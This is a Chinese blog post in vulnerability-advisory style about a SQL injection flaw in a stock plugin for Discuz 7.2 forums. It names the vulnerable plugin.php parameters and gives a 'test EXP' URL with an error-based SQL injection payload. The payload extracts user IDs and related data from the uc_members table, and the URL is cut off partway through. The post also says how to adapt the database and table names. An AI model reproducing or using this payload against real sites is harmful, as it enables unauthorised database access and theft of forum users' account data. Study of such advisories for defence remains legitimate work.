黑面小窝

欢迎光临小窝，有任何问题请留言反馈。QQ:3768110 本站使用全屏模板，导致你访问框架变形的敬请谅解~

导航

2010-7-29 18:26:38

Powered by Discuz7.2我的马甲插件注射漏洞

影响版本:
Powered by Discuz7.2
程序介绍:
Discuz! 一套通用的社区论坛软件系统，用户可以在不需要任何编程的基础上，通过简单的设置和安装，在互联网上搭建起具备完善功能、很强负载能力和可高度定制的论坛服务

漏洞插件：

plugin.php

测试EXP：

http://www.heimian.com/plugin.php?identifier=stock&module=stock&action=GuPiao_Show_One&stockid=49%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x7e,0x27,uc_members.uid,0x27,0x7e)%20FROM%20`bbs_data`.uc_members%2

参数 database Tables 视情况而定. 乱码就是编码问题。一般是UTF-8的
解决方案:
厂商补丁：
Discuz!
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.discuz.net/

信息来源:
<*来源: H4ckx7*>

Tags: web安全 注入 php

点击这里获取该日志的TrackBack引用地址

相关文章:
Web服务器性能/压力测试工具http_load、webbench、ab、Siege使用教程  (2010-7-27 23:31:39)
shop363网店程序真正通杀漏洞带关键字  (2010-7-27 16:20:12)
手注oracle技术  (2010-7-26 17:48:49)
巧用MSSQL读取文件旁注入侵渗透某站  (2010-7-26 14:47:57)
iis7.0 通杀0day  (2010-7-26 14:38:22)
高薪招聘网络安全人才  (2010-7-23 17:53:26)
PhpCMS一个漏洞的二次利用  (2010-7-23 0:12:28)
三防注入代码(收集)  (2010-7-21 0:52:6)

◎欢迎参与讨论，请在这里发表您的看法、交流您的观点。

日历

最新评论及回复

最近发表

Powered By Apple Party

Copyright Black face WebSite. Some Rights Reserved.